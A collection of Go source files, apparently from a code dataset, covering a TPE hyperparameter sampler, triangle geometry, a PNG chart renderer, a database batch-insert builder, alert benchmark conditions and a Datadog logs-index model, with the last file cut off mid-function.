// logsumRows computes a numerically stable log-sum-exp over each row of x:
// y[i] = log(sum_j exp(x[i][j])), using the max-shift trick to avoid
// overflow.
//
// The previous implementation accumulated log(exp(v-m)) — i.e. the raw
// shifted values — instead of exp(v-m), which is not log-sum-exp at all
// (for a row of k equal values v it returned v rather than v + log(k)).
func (s *Sampler) logsumRows(x [][]float64) []float64 {
	y := make([]float64, len(x))
	for i := range x {
		m := floats.Max(x[i])
		sum := 0.0
		for j := range x[i] {
			sum += math.Exp(x[i][j] - m)
		}
		y[i] = math.Log(sum) + m
	}
	return y
}
// gmmLogPDF evaluates the log probability density of each sample under the
// Gaussian mixture described by parzenEstimator, truncated to [low, high).
//
// When q > 0 the density is discretized: a sample's probability is the
// mixture mass of [sample-q/2, sample+q/2] clamped to the domain. When
// isLog is true the samples live in the exponentiated space while the
// mixture is defined over log-space, so the log-normal CDF and a 1/x
// Jacobian correction are used.
//
// This version fixes three defects in the previous implementation:
//   - the truncation mass paccept now weights both CDF terms,
//     sum_i w_i*(Phi_i(high) - Phi_i(low)), instead of leaving the low-CDF
//     term unweighted;
//   - the discretized branch normalizes by paccept (subtracts its log)
//     instead of multiplying by it;
//   - the Mahalanobis term squares the whole standardized distance,
//     ((x-mu)/sigma)^2, rather than dividing the distance by sigma^2.
func (s *Sampler) gmmLogPDF(samples []float64, parzenEstimator *ParzenEstimator, low, high float64, q float64, isLog bool) []float64 {
	weights := parzenEstimator.Weights
	mus := parzenEstimator.Mus
	sigmas := parzenEstimator.Sigmas

	if len(samples) == 0 {
		return []float64{}
	}

	highNormalCdf := s.normalCDF(high, mus, sigmas)
	lowNormalCdf := s.normalCDF(low, mus, sigmas)
	if len(weights) != len(highNormalCdf) {
		panic("the length should be the same with weights")
	}

	// Total mixture mass inside the truncation interval [low, high).
	paccept := 0.0
	for i := 0; i < len(highNormalCdf); i++ {
		paccept += weights[i] * (highNormalCdf[i] - lowNormalCdf[i])
	}

	if q > 0 {
		// Discretized branch: accumulate each component's mass over the
		// q-interval around every sample.
		probabilities := make([]float64, len(samples))
		if len(weights) != len(mus) || len(weights) != len(sigmas) {
			panic("should be the same length of weights, mus and sigmas")
		}
		for i := range weights {
			w := weights[i]
			mu := mus[i]
			sigma := sigmas[i]
			upperBound := make([]float64, len(samples))
			lowerBound := make([]float64, len(samples))
			for i := range upperBound {
				if isLog {
					upperBound[i] = math.Min(samples[i]+q/2.0, math.Exp(high))
					lowerBound[i] = math.Max(samples[i]-q/2.0, math.Exp(low))
					lowerBound[i] = math.Max(0, lowerBound[i])
				} else {
					upperBound[i] = math.Min(samples[i]+q/2.0, high)
					lowerBound[i] = math.Max(samples[i]-q/2.0, low)
				}
			}
			incAmt := make([]float64, len(samples))
			for j := range upperBound {
				if isLog {
					incAmt[j] = w * s.logNormalCDF(upperBound[j], []float64{mu}, []float64{sigma})[0]
					incAmt[j] -= w * s.logNormalCDF(lowerBound[j], []float64{mu}, []float64{sigma})[0]
				} else {
					incAmt[j] = w * s.normalCDF(upperBound[j], []float64{mu}, []float64{sigma})[0]
					incAmt[j] -= w * s.normalCDF(lowerBound[j], []float64{mu}, []float64{sigma})[0]
				}
			}
			for j := range probabilities {
				probabilities[j] += incAmt[j]
			}
		}
		returnValue := make([]float64, len(samples))
		for i := range probabilities {
			// log(p / paccept), eps-guarded.
			returnValue[i] = math.Log(probabilities[i]+eps) - math.Log(paccept+eps)
		}
		return returnValue
	}

	// Continuous branch: evaluate the truncated mixture density at each
	// sample. In log-space the log-normal density carries a 1/x Jacobian,
	// folded into the normalizer Z below.
	var jacobian []float64
	if isLog {
		jacobian = samples
	} else {
		jacobian = ones1d(len(samples))
	}

	distance := make([][]float64, len(samples))
	for i := range samples {
		distance[i] = make([]float64, len(mus))
		for j := range mus {
			if isLog {
				distance[i][j] = math.Log(samples[i]) - mus[j]
			} else {
				distance[i][j] = samples[i] - mus[j]
			}
		}
	}
	mahalanobis := make([][]float64, len(distance))
	for i := range distance {
		mahalanobis[i] = make([]float64, len(distance[i]))
		for j := range distance[i] {
			mahalanobis[i][j] = math.Pow(distance[i][j]/math.Max(sigmas[j], eps), 2)
		}
	}
	z := make([][]float64, len(distance))
	for i := range distance {
		z[i] = make([]float64, len(distance[i]))
		for j := range distance[i] {
			z[i][j] = math.Sqrt(2*math.Pi) * sigmas[j] * jacobian[i]
		}
	}
	coefficient := make([][]float64, len(distance))
	for i := range distance {
		coefficient[i] = make([]float64, len(distance[i]))
		for j := range distance[i] {
			coefficient[i][j] = weights[j] / z[i][j] / paccept
		}
	}
	y := make([][]float64, len(distance))
	for i := range distance {
		y[i] = make([]float64, len(distance[i]))
		for j := range distance[i] {
			y[i][j] = -0.5*mahalanobis[i][j] + math.Log(coefficient[i][j])
		}
	}
	// Log-sum-exp over the components gives the mixture log density.
	return s.logsumRows(y)
}
// sampleFromCategoricalDist draws size category indices from the discrete
// distribution defined by probabilities.
func (s *Sampler) sampleFromCategoricalDist(probabilities []float64, size int) []int {
	if size == 0 {
		return []int{}
	}
	// Each multinomial draw with n=1 is a one-hot count vector; the chosen
	// category index is recovered as sum(count * index) over that vector.
	draws := random.Multinomial(1, probabilities, size)
	indices := make([]int, size)
	for i := 0; i < size; i++ {
		chosen := 0
		for category, count := range draws[i] {
			chosen += count * category
		}
		indices[i] = chosen
	}
	return indices
}
// categoricalLogPDF returns log(p[c]) for every category index c in sample.
func (s *Sampler) categoricalLogPDF(sample []int, p []float64) []float64 {
	if len(sample) == 0 {
		return []float64{}
	}
	logps := make([]float64, len(sample))
	for i, category := range sample {
		logps[i] = math.Log(p[category])
	}
	return logps
}
// compare scores each candidate by logL - logG (the TPE acquisition, i.e.
// log of l(x)/g(x)) and returns a slice of the same length as samples in
// which every entry is the best-scoring candidate. On ties, the earliest
// candidate wins.
func (s *Sampler) compare(samples []float64, logL []float64, logG []float64) []float64 {
	if len(samples) == 0 {
		return []float64{}
	}
	if len(logL) != len(logG) {
		panic("the size of the log_l and log_g should be same")
	}
	score := make([]float64, len(logL))
	for i := range score {
		score[i] = logL[i] - logG[i]
	}
	if len(samples) != len(score) {
		panic("the size of the samples and score should be same")
	}
	// Locate the index of the maximum score (strict comparison keeps the
	// first maximum, matching the original closure-based argmax).
	best := 0
	for i := 1; i < len(score); i++ {
		if score[i] > score[best] {
			best = i
		}
	}
	results := make([]float64, len(samples))
	for i := range results {
		results[i] = samples[best]
	}
	return results
}
// sampleNumerical fits Parzen estimators to the "below" (good) and "above"
// (bad) observations, draws numberOfEICandidates candidates from the
// "below" estimator, and returns the candidate that maximizes the ratio of
// likelihoods l(x)/g(x). q > 0 quantizes the search; isLog searches in log
// space.
func (s *Sampler) sampleNumerical(low, high float64, below, above []float64, q float64, isLog bool) float64 {
	if isLog {
		low = math.Log(low)
		high = math.Log(high)
		// Log-transform into fresh slices: the previous code mutated the
		// caller's below/above slices in place.
		logBelow := make([]float64, len(below))
		for i, v := range below {
			logBelow[i] = math.Log(v)
		}
		below = logBelow
		logAbove := make([]float64, len(above))
		for i, v := range above {
			logAbove[i] = math.Log(v)
		}
		above = logAbove
	}
	size := s.numberOfEICandidates
	parzenEstimatorBelow := NewParzenEstimator(below, low, high, s.params)
	sampleBelow := s.sampleFromGMM(parzenEstimatorBelow, low, high, size, q, isLog)
	logLikelihoodsBelow := s.gmmLogPDF(sampleBelow, parzenEstimatorBelow, low, high, q, isLog)
	parzenEstimatorAbove := NewParzenEstimator(above, low, high, s.params)
	logLikelihoodsAbove := s.gmmLogPDF(sampleBelow, parzenEstimatorAbove, low, high, q, isLog)
	return s.compare(sampleBelow, logLikelihoodsBelow, logLikelihoodsAbove)[0]
}
// sampleUniform draws a value for a linear uniform distribution.
func (s *Sampler) sampleUniform(distribution goptuna.UniformDistribution, below, above []float64) float64 {
	return s.sampleNumerical(distribution.Low, distribution.High, below, above, 0, false)
}
// sampleLogUniform draws a value for a log-uniform distribution by
// delegating to the numerical sampler in log space.
func (s *Sampler) sampleLogUniform(distribution goptuna.LogUniformDistribution, below, above []float64) float64 {
	return s.sampleNumerical(distribution.Low, distribution.High, below, above, 0, true)
}
// sampleInt draws an integer parameter by treating it as a quantized
// continuous distribution with step 1, widening the range by half a step
// on each side so every integer owns an equal-sized bucket.
func (s *Sampler) sampleInt(distribution goptuna.IntUniformDistribution, below, above []float64) float64 {
	const q = 1.0
	low := float64(distribution.Low) - 0.5*q
	high := float64(distribution.High) + 0.5*q
	return s.sampleNumerical(low, high, below, above, q, false)
}
// sampleStepInt draws a stepped-integer parameter. Note the quantization
// width here is fixed at 1.0 (matching sampleInt) rather than taken from
// the distribution's step.
func (s *Sampler) sampleStepInt(distribution goptuna.StepIntUniformDistribution, below, above []float64) float64 {
	const q = 1.0
	low := float64(distribution.Low) - 0.5*q
	high := float64(distribution.High) + 0.5*q
	return s.sampleNumerical(low, high, below, above, q, false)
}
// sampleDiscreteUniform draws a value from a discrete uniform distribution
// with step Q, then clamps the result back into [Low, High].
func (s *Sampler) sampleDiscreteUniform(distribution goptuna.DiscreteUniformDistribution, below, above []float64) float64 {
	q := distribution.Q
	span := distribution.High - distribution.Low
	// [low, high] is shifted to [0, span] to align sampled values at regular
	// intervals. See https://github.com/optuna/optuna/pull/917#issuecomment-586114630
	// for details.
	low := -0.5 * q
	high := span + 0.5*q
	// Shift the observations into [0, span] as well. This intentionally
	// mutates the caller's slices in place, as the original did.
	for i := range below {
		below[i] -= distribution.Low
	}
	for i := range above {
		above[i] -= distribution.Low
	}
	best := distribution.Low + s.sampleNumerical(low, high, below, above, q, false)
	return math.Min(math.Max(best, distribution.Low), distribution.High)
}
func (s *Sampler) sampleCategorical(distribution goptuna.CategoricalDistribution, below, above []float64) float64 {
belowInt := make([]int, len(below))
for i := range below {
belowInt[i] = int(below[i])
}
aboveInt := make([]int, len(above))
for i := range above {
aboveInt[i] = int(above[i])
}
upper := len(distribution.Choices)
size := s.numberOfEICandidates
if s.numberOfEICandidates >= len(distribution.Choices) {
size = len(distribution.Choices)
}
// below
weightsBelow := s.params.Weights(len(below))
countsBelow := bincount(belowInt, weightsBelow, upper)
weightedBelowSum := 0.0
weightedBelow := make([]float64, len(countsBelow))
for i := range countsBelow {
weightedBelow[i] = countsBelow[i] + s.params.PriorWeight
weightedBelowSum += weightedBelow[i]
}
for i := range weightedBelow {
weightedBelow[i] /= weightedBelowSum
}
var samples []int
if s.numberOfEICandidates != size {
samples = make([]int, size)
for i := 0; i < size; i++ {
samples[i] = i
}
} else {
samples = s.sampleFromCategoricalDist(weightedBelow, size)
}
logLikelihoodsBelow := s.categoricalLogPDF(samples, weightedBelow)
// above
weightsAbove := s.params.Weights(len(above))
countsAbove := bincount(aboveInt, weightsAbove, upper)
weightedAboveSum := 0.0
weightedAbove := make([]float64, len(countsAbove))
for i := range countsAbove {
weightedAbove[i] = countsAbove[i] + s.params.PriorWeight
weightedAboveSum += weightedAbove[i]
}
for i := range weightedAbove {
weightedAbove[i] /= weightedAboveSum
}
logLikelihoodsAbove := s.categoricalLogPDF(samples, weightedAbove)
floatSamples := make([]float64, size)
for i := range samples {
floatSamples[i] = float64(samples[i])
}
return s.compare(floatSamples, logLikelihoodsBelow, logLikelihoodsAbove)[0]
}
// Sample returns a parameter value for the given distribution using the
// TPE algorithm, falling back to the random sampler until enough
// observations have accumulated for this parameter.
func (s *Sampler) Sample(
	study *goptuna.Study,
	trial goptuna.FrozenTrial,
	paramName string,
	paramDistribution interface{},
) (float64, error) {
	s.mu.Lock()
	defer s.mu.Unlock()
	values, scores, err := getObservationPairs(study, paramName)
	if err != nil {
		return 0, err
	}
	// Not enough history yet: defer to random sampling.
	if len(values) < s.numberOfStartupTrials {
		return s.randomSampler.Sample(study, trial, paramName, paramDistribution)
	}
	below, above := s.splitObservationPairs(values, scores)
	switch d := paramDistribution.(type) {
	case goptuna.UniformDistribution:
		return s.sampleUniform(d, below, above), nil
	case goptuna.LogUniformDistribution:
		return s.sampleLogUniform(d, below, above), nil
	case goptuna.IntUniformDistribution:
		return s.sampleInt(d, below, above), nil
	case goptuna.StepIntUniformDistribution:
		return s.sampleStepInt(d, below, above), nil
	case goptuna.DiscreteUniformDistribution:
		return s.sampleDiscreteUniform(d, below, above), nil
	case goptuna.CategoricalDistribution:
		return s.sampleCategorical(d, below, above), nil
	default:
		return 0, goptuna.ErrUnknownDistribution
	}
}
func getObservationPairs(study *goptuna.Study, paramName string) ([]float64, [][2]float64, error) {
var sign float64 = 1
if study.Direction() == goptuna.StudyDirectionMaximize {
sign = -1
}
trials, err := study.GetTrials()
if err != nil {
return nil, nil, err
}
values := make([]float64, 0, len(trials))
scores := make([][2]float64, 0, len(trials))
for _, trial := range trials {
ir, ok := trial.InternalParams[paramName]
if !ok {
continue
}
var paramValue, score0, score1 float64
paramValue = ir
if trial.State == goptuna.TrialStateComplete {
score0 = math.Inf(-1)
score1 = sign * trial.Value
} else if trial.State == goptuna.TrialStatePruned {
if len(trial.IntermediateValues) > 0 {
var step int
var intermediateValue float64
for key := range trial.IntermediateValues {
if key > step {
step = key
intermediateValue = trial.IntermediateValues[key]
}
}
score0 = float64(-step)
score1 = sign * intermediateValue
} else {
score0 = math.Inf(1)
score1 = 0.0
}
} else {
continue
}
values = append(values, paramValue)
scores = append(scores, [2]float64{score0, score1})
}
return values, scores, nil
} | tpe/sampler.go | 0.696475 | 0.409752 | sampler.go | starcoder |
package geometry
// GetNormal returns the triangle's normal vector. A precomputed Normal
// field (non-zero magnitude) is returned as-is; otherwise the normal is
// derived as the cross product of the two edges sharing Vertex0. No
// normalization is applied here.
func (triangle *Triangle) GetNormal() Vector {
	if Magnitude(triangle.Normal) > 0 {
		return triangle.Normal
	}
	e1 := CreateVector(triangle.Vertex1, triangle.Vertex0)
	e2 := CreateVector(triangle.Vertex2, triangle.Vertex0)
	return CrossProduct(e1, e2)
}
// getLinePoint returns the point at parameter d along the ray:
// origin + d * direction.
func getLinePoint(ray *Ray, d float64) Point {
	offset := ScalarProduct(ray.Vector, d)
	return Point{
		ray.Origin[0] + offset[0],
		ray.Origin[1] + offset[1],
		ray.Origin[2] + offset[2],
	}
}
// GetIntersection returns the point where ray meets the triangle, or nil
// when the ray is parallel to the triangle's plane, the plane lies behind
// the ray origin, or the plane hit falls outside the triangle.
func GetIntersection(ray *Ray, triangle *Triangle) *Point {
	const epsilon = 0.0000001
	normal := triangle.GetNormal()
	cos := DotProduct(ray.Vector, normal)
	if cos == 0 {
		// Ray direction is perpendicular to the normal: parallel to the plane.
		return nil
	}
	d := DotProduct(CreateVector(triangle.Vertex0, ray.Origin), normal) / cos
	if d < epsilon {
		// The plane is behind (or essentially at) the ray origin.
		return nil
	}
	hit := getLinePoint(ray, d)
	// Inside test: the three triangles formed by the hit point and each pair
	// of the original vertices tile the triangle exactly iff the point lies
	// inside it, so their summed area then equals the triangle's area.
	sub1 := &Triangle{Vertex0: triangle.Vertex0, Vertex1: triangle.Vertex1, Vertex2: hit}
	sub2 := &Triangle{Vertex0: triangle.Vertex2, Vertex1: triangle.Vertex1, Vertex2: hit}
	sub3 := &Triangle{Vertex0: triangle.Vertex2, Vertex1: triangle.Vertex0, Vertex2: hit}
	total := sub1.GetArea() + sub2.GetArea() + sub3.GetArea()
	if total-triangle.GetArea() < epsilon {
		return &hit
	}
	return nil
}
// GetArea returns the triangle's surface area: half the magnitude of the
// cross product of the two edges sharing Vertex0.
func (triangle *Triangle) GetArea() float64 {
	a := CreateVector(triangle.Vertex1, triangle.Vertex0)
	b := CreateVector(triangle.Vertex2, triangle.Vertex0)
	return 0.5 * Magnitude(CrossProduct(a, b))
}
// TriangulatePolygon fan-triangulates a polygon around its first vertex,
// producing len(points)-2 triangles that all share the given face normal,
// vertex normals, and texture properties. It returns nil when fewer than
// three points are supplied.
func TriangulatePolygon(points []Point, normal Vector, vertexNormals []Vector, texture *TextureProperties) []*Triangle {
	if len(points) < 3 {
		// A polygon needs at least three vertices; previously 0 or 1 points
		// panicked via make with a negative length.
		return nil
	}
	triangles := make([]*Triangle, 0, len(points)-2)
	for i := 1; i < len(points)-1; i++ {
		triangles = append(triangles, &Triangle{
			Vertex0:            points[0],
			Vertex1:            points[i],
			Vertex2:            points[i+1],
			Normal:             normal,
			VertexNormals:      vertexNormals,
			DiffuseAlbedo:      texture.DiffuseAlbedo,
			SpecularAlbedo:     texture.SpecularAlbedo,
			TranslucenseAlbedo: texture.TranslucenseAlbedo,
			MaterialType:       texture.MaterialType,
		})
	}
	return triangles
}
// GetFaceVertexes resolves a face's vertex indices into concrete points.
func GetFaceVertexes(face []int, vertexes []Point) []Point {
	points := make([]Point, 0, len(face))
	for _, vertexIndex := range face {
		points = append(points, vertexes[vertexIndex])
	}
	return points
}
func TriangulateObject(object *Object) []*Triangle {
var triangles []*Triangle
for i, face := range object.Faces {
var vertexNormals []Vector
points := GetFaceVertexes(face, object.Vertexes)
texture := object.Textures[object.TextureMap[i]]
if len(object.VertexNormals) > 0 {
vertexNormals = make([]Vector, len(points))
for p := 0; p < len(points); p++ {
vertexNormals[p] = Normalize(object.VertexNormals[face[p]])
}
}
normal := Normalize(object.Normals[i])
triangles = append(
triangles,
TriangulatePolygon(points, normal, vertexNormals, &texture)...,
)
}
return triangles
} | pkg/geometry/triangle.go | 0.829492 | 0.808332 | triangle.go | starcoder |
package chart
import (
"image"
"image/png"
"io"
"math"
"github.com/golang/freetype/truetype"
"github.com/liuxhu/go-chart/v2/drawing"
)
// PNG returns a new png/raster renderer.
func PNG(width, height int) (Renderer, error) {
i := image.NewRGBA(image.Rect(0, 0, width, height))
gc, err := drawing.NewRasterGraphicContext(i)
if err == nil {
return &rasterRenderer{
i: i,
gc: gc,
}, nil
}
return nil, err
}
// rasterRenderer renders chart commands to a bitmap.
type rasterRenderer struct {
i *image.RGBA
gc *drawing.RasterGraphicContext
rotateRadians *float64
s Style
}
func (rr *rasterRenderer) ResetStyle() {
rr.s = Style{Font: rr.s.Font}
rr.ClearTextRotation()
}
// GetDPI returns the dpi.
func (rr *rasterRenderer) GetDPI() float64 {
return rr.gc.GetDPI()
}
// SetDPI implements the interface method.
func (rr *rasterRenderer) SetDPI(dpi float64) {
rr.gc.SetDPI(dpi)
}
// SetClassName implements the interface method. However, PNGs have no classes.
func (rr *rasterRenderer) SetClassName(_ string) {}
// SetStrokeColor implements the interface method.
func (rr *rasterRenderer) SetStrokeColor(c drawing.Color) {
rr.s.StrokeColor = c
}
// SetLineWidth implements the interface method.
func (rr *rasterRenderer) SetStrokeWidth(width float64) {
rr.s.StrokeWidth = width
}
// StrokeDashArray sets the stroke dash array.
func (rr *rasterRenderer) SetStrokeDashArray(dashArray []float64) {
rr.s.StrokeDashArray = dashArray
}
// SetFillColor implements the interface method.
func (rr *rasterRenderer) SetFillColor(c drawing.Color) {
rr.s.FillColor = c
}
// MoveTo implements the interface method.
func (rr *rasterRenderer) MoveTo(x, y int) {
rr.gc.MoveTo(float64(x), float64(y))
}
// LineTo implements the interface method.
func (rr *rasterRenderer) LineTo(x, y int) {
rr.gc.LineTo(float64(x), float64(y))
}
// QuadCurveTo implements the interface method.
func (rr *rasterRenderer) QuadCurveTo(cx, cy, x, y int) {
rr.gc.QuadCurveTo(float64(cx), float64(cy), float64(x), float64(y))
}
// ArcTo implements the interface method.
func (rr *rasterRenderer) ArcTo(cx, cy int, rx, ry, startAngle, delta float64) {
rr.gc.ArcTo(float64(cx), float64(cy), rx, ry, startAngle, delta)
}
// Close implements the interface method.
func (rr *rasterRenderer) Close() {
rr.gc.Close()
}
// Stroke implements the interface method.
func (rr *rasterRenderer) Stroke() {
rr.gc.SetStrokeColor(rr.s.StrokeColor)
rr.gc.SetLineWidth(rr.s.StrokeWidth)
rr.gc.SetLineDash(rr.s.StrokeDashArray, 0)
rr.gc.Stroke()
}
// Fill implements the interface method.
func (rr *rasterRenderer) Fill() {
rr.gc.SetFillColor(rr.s.FillColor)
rr.gc.Fill()
}
// FillStroke implements the interface method.
func (rr *rasterRenderer) FillStroke() {
rr.gc.SetFillColor(rr.s.FillColor)
rr.gc.SetStrokeColor(rr.s.StrokeColor)
rr.gc.SetLineWidth(rr.s.StrokeWidth)
rr.gc.SetLineDash(rr.s.StrokeDashArray, 0)
rr.gc.FillStroke()
}
// Circle fully draws a circle at a given point but does not apply the fill or stroke.
func (rr *rasterRenderer) Circle(radius float64, x, y int) {
xf := float64(x)
yf := float64(y)
rr.gc.MoveTo(xf-radius, yf) //9
rr.gc.QuadCurveTo(xf-radius, yf-radius, xf, yf-radius) //12
rr.gc.QuadCurveTo(xf+radius, yf-radius, xf+radius, yf) //3
rr.gc.QuadCurveTo(xf+radius, yf+radius, xf, yf+radius) //6
rr.gc.QuadCurveTo(xf-radius, yf+radius, xf-radius, yf) //9
}
// SetFont implements the interface method.
func (rr *rasterRenderer) SetFont(f *truetype.Font) {
rr.s.Font = f
}
// SetFontSize implements the interface method.
func (rr *rasterRenderer) SetFontSize(size float64) {
rr.s.FontSize = size
}
// SetFontColor implements the interface method.
func (rr *rasterRenderer) SetFontColor(c drawing.Color) {
rr.s.FontColor = c
}
// Text implements the interface method.
func (rr *rasterRenderer) Text(body string, x, y int) {
xf, yf := rr.getCoords(x, y)
rr.gc.SetFont(rr.s.Font)
rr.gc.SetFontSize(rr.s.FontSize)
rr.gc.SetFillColor(rr.s.FontColor)
rr.gc.CreateStringPath(body, float64(xf), float64(yf))
rr.gc.Fill()
}
// MeasureText returns the height and width in pixels of a string.
func (rr *rasterRenderer) MeasureText(body string) Box {
rr.gc.SetFont(rr.s.Font)
rr.gc.SetFontSize(rr.s.FontSize)
rr.gc.SetFillColor(rr.s.FontColor)
l, t, r, b, err := rr.gc.GetStringBounds(body)
if err != nil {
return Box{}
}
if l < 0 {
r = r - l // equivalent to r+(-1*l)
l = 0
}
if t < 0 {
b = b - t
t = 0
}
if l > 0 {
r = r + l
l = 0
}
if t > 0 {
b = b + t
t = 0
}
textBox := Box{
Top: int(math.Ceil(t)),
Left: int(math.Ceil(l)),
Right: int(math.Ceil(r)),
Bottom: int(math.Ceil(b)),
}
if rr.rotateRadians == nil {
return textBox
}
return textBox.Corners().Rotate(RadiansToDegrees(*rr.rotateRadians)).Box()
}
// SetTextRotation sets a text rotation.
func (rr *rasterRenderer) SetTextRotation(radians float64) {
rr.rotateRadians = &radians
}
func (rr *rasterRenderer) getCoords(x, y int) (xf, yf int) {
if rr.rotateRadians == nil {
xf = x
yf = y
return
}
rr.gc.Translate(float64(x), float64(y))
rr.gc.Rotate(*rr.rotateRadians)
return
}
// ClearTextRotation clears text rotation.
func (rr *rasterRenderer) ClearTextRotation() {
rr.gc.SetMatrixTransform(drawing.NewIdentityMatrix())
rr.rotateRadians = nil
}
// Save implements the interface method.
func (rr *rasterRenderer) Save(w io.Writer) error {
if typed, isTyped := w.(RGBACollector); isTyped {
typed.SetRGBA(rr.i)
return nil
}
return png.Encode(w, rr.i)
} | raster_renderer.go | 0.857007 | 0.420778 | raster_renderer.go | starcoder |
package db
import (
"fmt"
"sort"
sq "github.com/Masterminds/squirrel"
"github.com/paydex-core/paydex-go/support/errors"
)
// Row adds a new row to the batch. All rows must have exactly the same columns
// (map keys). Otherwise, error will be returned. Please note that rows are not
// added one by one but in batches when `Exec` is called (or `MaxBatchSize` is
// reached).
func (b *BatchInsertBuilder) Row(row map[string]interface{}) error {
if b.columns == nil {
b.columns = make([]string, 0, len(row))
b.rows = make([][]interface{}, 0)
for column := range row {
b.columns = append(b.columns, column)
}
sort.Strings(b.columns)
}
if len(b.columns) != len(row) {
return errors.Errorf("invalid number of columns (expected=%d, actual=%d)", len(b.columns), len(row))
}
rowSlice := make([]interface{}, 0, len(b.columns))
for _, column := range b.columns {
val, ok := row[column]
if !ok {
return errors.Errorf(`column "%s" does not exist`, column)
}
rowSlice = append(rowSlice, val)
}
b.rows = append(b.rows, rowSlice)
// Call Exec when MaxBatchSize is reached.
if len(b.rows) == b.MaxBatchSize {
return b.Exec()
}
return nil
}
// Exec inserts rows in batches. In case of errors it's possible that some batches
// were added so this should be run in a DB transaction for easy rollbacks.
func (b *BatchInsertBuilder) Exec() error {
b.sql = sq.Insert(b.Table.Name).Columns(b.columns...)
paramsCount := 0
for _, row := range b.rows {
b.sql = b.sql.Values(row...)
paramsCount += len(row)
if paramsCount > postgresQueryMaxParams-2*len(b.columns) {
_, err := b.Table.Session.Exec(b.sql)
if err != nil {
return errors.Wrap(err, fmt.Sprintf("error adding values while inserting to %s", b.Table.Name))
}
paramsCount = 0
b.sql = sq.Insert(b.Table.Name).Columns(b.columns...)
}
}
// Insert last batch
if paramsCount > 0 {
_, err := b.Table.Session.Exec(b.sql)
if err != nil {
return errors.Wrap(err, fmt.Sprintf("error adding values while inserting to %s", b.Table.Name))
}
}
// Clear the rows so user can reuse it for batch inserting to a single table
b.rows = make([][]interface{}, 0)
return nil
} | support/db/batch_insert_builder.go | 0.682256 | 0.411229 | batch_insert_builder.go | starcoder |
package sub
import (
"fmt"
)
type BenchmarkType uint
const (
BenchmarkTypeTypeUndefined BenchmarkType = 0
BenchmarkTypeEqual BenchmarkType = 1
BenchmarkTypeGT BenchmarkType = 2
BenchmarkTypeGTE BenchmarkType = 3
BenchmarkTypeLT BenchmarkType = 4
BenchmarkTypeLTE BenchmarkType = 5
BenchmarkTypeRange BenchmarkType = 6
BenchmarkTypeOutOfRange BenchmarkType = 7
BenchmarkTypeNoValue BenchmarkType = 8 // TODO:to be implemented
BenchmarkTypeHasValue BenchmarkType = 9 // TODO:to be implemented
)
type Condition struct {
DatasourceID int64 `json:"datasourceId"`
Script string `json:"script"`
Benchmark Benchmark `json:"benchmark"`
}
type Benchmark struct {
Type BenchmarkType `json:"type"`
SingleValue float64 `json:"singleValue"`
Range struct {
Lower float64 `json:"lower"`
Upper float64 `json:"upper"`
}
}
func (b *Benchmark) String() string {
switch b.Type {
default:
return fmt.Sprintf("unsupported benchmark:%d", b.Type)
case BenchmarkTypeEqual:
return fmt.Sprintf("!=%.2f", b.SingleValue)
case BenchmarkTypeGT:
return fmt.Sprintf("<=%.2f", b.SingleValue)
case BenchmarkTypeGTE:
return fmt.Sprintf("<%.2f", b.SingleValue)
case BenchmarkTypeLT:
return fmt.Sprintf(">=%.2f", b.SingleValue)
case BenchmarkTypeLTE:
return fmt.Sprintf(">%.2f", b.SingleValue)
case BenchmarkTypeRange:
return fmt.Sprintf("not in (%.2f,%.2f)", b.Range.Lower, b.Range.Upper)
case BenchmarkTypeOutOfRange:
return fmt.Sprintf("in (%.2f,%.2f)", b.Range.Lower, b.Range.Upper)
}
}
type ConditionResult struct {
Name string `json:"name"`
Value float64 `json:"value"`
DatasourceResult *DatasourceResult `json:"datasourceResult"`
Alerting bool `json:"alerting"`
Condition *Condition `json:"condition"`
}
func (r *ConditionResult) String() string {
if r.Alerting {
return fmt.Sprintf("%s should %s, but is %.4f", r.Name, r.Condition.Benchmark.String(), r.Value)
}
return fmt.Sprintf("%s should %s, and is %.2f", r.Name, r.Condition.Benchmark.String(), r.Value)
}
// NotValid test the benchmark result is not valid
func (b *Benchmark) NotValid(value float64) bool {
switch b.Type {
default:
return false
case BenchmarkTypeEqual:
return value == b.SingleValue
case BenchmarkTypeGT:
return value > b.SingleValue
case BenchmarkTypeGTE:
return value >= b.SingleValue
case BenchmarkTypeLT:
return value < b.SingleValue
case BenchmarkTypeLTE:
return value <= b.SingleValue
case BenchmarkTypeRange:
return value >= b.Range.Lower && value <= b.Range.Upper
case BenchmarkTypeOutOfRange:
return !(value >= b.Range.Lower && value <= b.Range.Upper)
}
} | be/ent/schema/sub/rule_condition.go | 0.505615 | 0.472379 | rule_condition.go | starcoder |
package datadog
import (
"encoding/json"
"fmt"
)
// LogsIndexesOrder Object containing the ordered list of log index names.
type LogsIndexesOrder struct {
// Array of strings identifying by their name(s) the index(es) of your organization. Logs are tested against the query filter of each index one by one, following the order of the array. Logs are eventually stored in the first matching index.
IndexNames []string `json:"index_names"`
// UnparsedObject contains the raw value of the object if there was an error when deserializing into the struct
UnparsedObject map[string]interface{} `json:-`
}
// NewLogsIndexesOrder instantiates a new LogsIndexesOrder object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewLogsIndexesOrder(indexNames []string) *LogsIndexesOrder {
this := LogsIndexesOrder{}
this.IndexNames = indexNames
return &this
}
// NewLogsIndexesOrderWithDefaults instantiates a new LogsIndexesOrder object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
func NewLogsIndexesOrderWithDefaults() *LogsIndexesOrder {
this := LogsIndexesOrder{}
return &this
}
// GetIndexNames returns the IndexNames field value
func (o *LogsIndexesOrder) GetIndexNames() []string {
if o == nil {
var ret []string
return ret
}
return o.IndexNames
}
// GetIndexNamesOk returns a tuple with the IndexNames field value
// and a boolean to check if the value has been set.
func (o *LogsIndexesOrder) GetIndexNamesOk() (*[]string, bool) {
if o == nil {
return nil, false
}
return &o.IndexNames, true
}
// SetIndexNames sets field value
func (o *LogsIndexesOrder) SetIndexNames(v []string) {
o.IndexNames = v
}
func (o LogsIndexesOrder) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
if o.UnparsedObject != nil {
return json.Marshal(o.UnparsedObject)
}
if true {
toSerialize["index_names"] = o.IndexNames
}
return json.Marshal(toSerialize)
}
func (o *LogsIndexesOrder) UnmarshalJSON(bytes []byte) (err error) {
raw := map[string]interface{}{}
required := struct {
IndexNames *[]string `json:"index_names"`
}{}
all := struct {
IndexNames []string `json:"index_names"`
}{}
err = json.Unmarshal(bytes, &required)
if err != nil {
return err
}
if required.IndexNames == nil {
return fmt.Errorf("Required field index_names missing")
}
